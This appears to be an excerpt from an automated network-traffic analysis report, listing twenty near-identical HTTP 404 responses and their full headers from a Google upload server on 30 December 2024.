                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zw3Cy7V4RUsdhBpaaYUUlA79ahimYQjFgdyjqeOjvHujYtRsMsaegWWjQKB3nxsyMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-D1nQFe1mu63h61C2NEWQ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Jhg2hCTUy3ese7-BAkYlQQmrcsKh-dT0_DMpkMJdyOSIav5yCzWAVV_z9377v5xnH3iUpesUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QnELD4iSBQ4z4wHvxTmLhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lrNtNmMrZFu1nW6CgRsnm3e08VyybeC672SKzCK1KSl_xQof1OvMDAN9c45jbzoSKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:51 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GhGD48duzjwWq0iHhpvSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4d92cJFdJiVNa9eFSZfKv7P6lnDXO2BYw7OmGT1S3ie9_IqHopdM1CkgH66KCyI10n-8hNfJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:51 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZC-wFo_hQk4T4hNQ4pBcVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78_eg5XewAkuh3xck0WBShnNvQxtkSfqlnfZl19gkkD4nqOC-5vGn5r_DuaHeIja9YWIlK9wQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:52 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zSvyTcHj0D2JUch8206yEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4oY-GARncQEDZ0cQsqEoc_K2TW44oOfLJAeJQFdJUUUMNON3kQKfblRU08_YkDXavKap0qP64Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:53 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-VsqyH0TSWQkn3H0OQGuqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sXiif5GL6JjzU04Yp6gARQa5-yIxMq3l4odgVdA9uNTxAL52wtHHDyjd7Odi89lVBhmj_9XIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hosNYiIhRYXnivuXG93jxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4aTYrtBO3tIK5UUqTTSEIdd_UNmZ-azqQVolpSNPrzBheJjWsiy_n6qxMbkH-0F-hfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:55 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ftZtmqNplQUJXpFMnoCf1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4bYkTwNeCxPGp_3BhGc8ZU7DOExsdp1IJnRu92qe5Km7VW2QoWcDgcjCxUbhqLjseFfQwBzuYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-u_yJCVKGR0Bue4MeWV9Jxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78R_9SfpG1mtwdjUV-eg6feTIyisWy8tOGMQcE0WvK7eWQIg9JmQABwCfbf-EGA4t2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:56 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-88wrk4mwz5woJIo30CSorw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7uckmJjbG6pRoIoO_DqJ8hSCNpSPlSVaQFTN34_8IZ47cqTHEM5AVE7cl13xdn0i_1_eZi-c0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CeNAxE4kT95s6BSGXV5iAg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7fnboO1oysK1SxL2f-Ld-ah3ZxOll19V2MNkCwIEoTBvbEQOP7MVLMnonkpGdQLaOqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:59 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RAZRI47Ns8ojv8t7u_DTcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QYR8TdrWc-hFbZ__t4OCTPKdJ6adOlF7lYCO3B-1EGA8P7SsY4303mVdAlmZdEa6EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xlT_aRDpGHQH9k4OvRktzw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC56Cshp4Xul7Ybvx4uxkl591XhqgmeJIomstq5s3UE8uZKM3kIDKwq7KOQMuuWxlow0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:00 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-ZbZPziDJOT7AXu4ld74VwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5yveiLSskt7iFiFxg6XgpuxgGkEIXbzJHDQQuW1srNQly4ssmh1saYmQEtE8_Xj_kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-saZtOUn30UKr2bjhO9Qryw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC74Oxl__-inG6dAcVNgbl_Kz4uLLTYSQXcbPXJtxUxNWf_ZRk75h9DXtxwQwhfKr4DQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:02 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Uq6h2JItZOSxoxTdiqpqVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Mi8Z2l1YdcIjnX8j4rJh4LUozlRBqHu7UJFv4feoTXHiRlGYqs7xfvmQ1VjfChrtRYRmjN7IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-47A-ybEfCOelnalS-LI6cQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5WRgAoBA_Yst7XzWoKn8EIbZ8lxMfHpPIJc34E0fCpHissx0pU23vKgWIOlX-My7uPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-dyfSp9yr1pF0duvKQtgy_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5s8vuHhHslu7LgAC0HtCgROm2ZfMqK934S3PxNN8JKkGHXoGEkwM5nh-2bJpzp0uD-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:05 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-SQhGkBFRkkWbegD8wMV8SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC55mzfMvGiXsTDOWC66KV_2Pn1lCS4KMAuWNZWC4l2JgP6g-N-225GhSgJfJq2z0fs-jDJkYdgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:41:05 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-90saIUCqHa3RaD2Jl8l3kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
